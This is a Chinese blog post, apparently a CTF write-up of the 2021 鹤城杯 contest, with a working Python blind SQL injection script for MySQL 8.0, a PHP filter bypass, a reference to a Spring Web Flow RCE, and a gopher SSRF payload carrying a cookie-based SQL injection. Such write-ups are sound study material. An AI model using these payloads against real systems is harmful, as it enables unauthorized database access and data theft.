Posted Updated 6 minutes read (About 935 words)

2021鹤城杯

前言

今天满课了,抽时间打了一下鹤城杯,web做了两题,第三题感觉可以做的,因为在去上课的路上查到了bypass的手法,不过后面学长也做出来了,tql,然后做了两题流量取证的misc,还不错,这里就就贴一下自己做出来的几题,顺便记录一下其他没做出来的题

middle_magic

考烂的php黑魔法
img

流量取证

盲注找flag
img

flag{w1reshARK_ez_1sntit}

easy_sql_2

拿了一个十血,但是感觉可以更快的,可惜早上有课

过滤了select,联想到堆叠或者mysql8.0的table
测试了一下发现是mysql8.0,故用table进行注入

def sql_injection(pay_lo):#库名和版本
    fina_wod=""
    for i in range(1,100):
        low=32
        high=128
        mid=(low+high)//2
        while(low<high):
            payload_1=f"admin'and ascii(substr(({payload}),{i},1))>{mid}#".replace(" ","/**/")
            data={
                'username':payload_1,
                'password':"1"
            }
            #print(data)
            r=s.post(url=url,data=data).text
            print(r)
            if "password error!" in r:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if (mid == 32 or mid == 128):
            break
        fina_wod += chr(mid)
        print(fina_wod)

def sql_injection_s():#表名
    fina_wod=""
    a="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    for i in range(0,100):
        for j in range(0,62):
            #payload_2=f"admin'and (('def','ctf','{fina_wod+a[j]}','',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)<(table information_schema.tables order by TABLE_SCHEMA limit 1,1))#".replace(" ","/**/")
            payload_2=f"admin'and ('ctf','{fina_wod+a[j]}',1,1,1,1)<(table mysql.innodb_table_stats order by database_name limit 1,1)#".replace(" ","/**/")
            data={
                'username':payload_2,
                'password':"1"
            }
            r = s.post(url=url, data=data).text
            print(payload_2)
            print(r)
            if "username error" in r:
                fina_wod+=a[j-1]
                print(fina_wod)
                break

def search_co():#探测表在第几个
    for i in range(0,10000):
        #payload=f"admin'and/**/('def','ct',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)<(table information_schema.tables order by table_schema desc limit {i},1)#".replace(" ","/**/")
        payload=f"admin'and/**/('ct',1,1,1,1,1)<(table mysql.innodb_table_stats order by database_name limit {i},1)#".replace(" ","/**/")
        data1={
            'username':payload,
            'password':"123"
        }
        #print(data1)
        #print(s.post(url=url,data=data1).text)
        if "username error!" in s.post(url=url,data=data1).text:
            print("ctf库在第",i,"列")


if __name__=="__main__":
    #payload="database()"#ctf
    #payload="version()"#8.0.26-0ubuntu0.20.04.2
    payload="table fl11aag limit 1,1"
    #search_co()
    #print_word()
    sql_injection(payload)
    #sql_injection_s()

img

misc

img img

依旧是盲注找flag,没啥好说的,不过前面的好像是图片隐写啥的,没做出来,xy大佬发给我的这个流量取证的

99,100,50,99,51,101,50,102,101,97,52,54,51,100,101,100,57,97,102,56,48,48,100,55,49,53,53,98,101,55,97,113,125

easyp

同样是黑魔法

<?php
include 'flag.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}

第一个用%0a或者%0d绕过,一开始我用%0a可以,后来用%0d才可以,都放在utils.php的后面
然后第二个使用url的一个检测机制绕过
访问这个是学长的截图了,放在这里记录一下
img

spring

这题也是学长做的,不过说是原题

Spring Web Flow框架远程代码执行(CVE-2017-4971)

https://juejin.cn/post/7006672559714336805

easy_sql_1

唯一没做出来的一题
一开始以为是ssrf打mysql,后来发现怎么打都不行,然后赛后问其他师傅,说是要打index.php那个页面,贴一下flag

a = "admin')and (extractvalue(1,concat(0x7e,(select group_concat(flag) from flag),0x7e)))#"
a = quote(base64.b64encode(a.encode("utf-8")))
payload = f'''gopher%3a%2f%2f127.0.0.1%3a80%2f_post%20%2findex.php%20http%2f1.1%250d%250ahost%3a%20localhost%3a80%250d%250acookie%3a%20phpsessid%3d25c1mm4b3ppn9ohr2gve7d4tg4%3bthis_is_your_cookie%3d{a}%250d%250aconnection%3a%20close%250d%250acontent-type%3a%20application%2fx-www-form-urlencoded%250d%250acontent-length%3a%2021%250d%250a%250d%250auname%3dadmin%26passwd%3dadmin'''

解码以后是就是使用gopher发送post请求到本地的index.php页面,然后使用admin/admin进行登录,并且注入点是在cookie的位置的

a = "admin')and (extractvalue(1,concat(0x7e,(select group_concat(flag) from flag),0x7e)))#"
a = quote(base64.b64encode(a.encode("utf-8")))
payload = f'''gopher://127.0.0.1:80/_post /index.php http/1.1
host: localhost:80
cookie: phpsessid=25c1mm4b3ppn9ohr2gve7d4tg4;this_is_your_cookie={a}
connection: close
content-type: application/x-www-form-urlencoded
content-length: 21

uname=admin&passwd=admin'''

2021鹤城杯

http://example.com/2021/10/08/2021鹤城杯/

Author

vague huang

Posted on

2021-10-08

Updated on

2021-10-08

Licensed under

Like this article? Support the author with

Comments

Follow

Links

Recents

Archives

Tags

CSRF1
MYSQL1
PHP5
XSS1
bugku3
bugku21
hexo1
html1
html原理1
php2
sqlmap1
sql注入9
typro1
xss1
反弹shell2
文件上传1
文件包含1
渗透测试1

Subscribe for updates

You need to set client_id and slot_id to show this AD unit. Please set it in _config.yml.

follow.it

×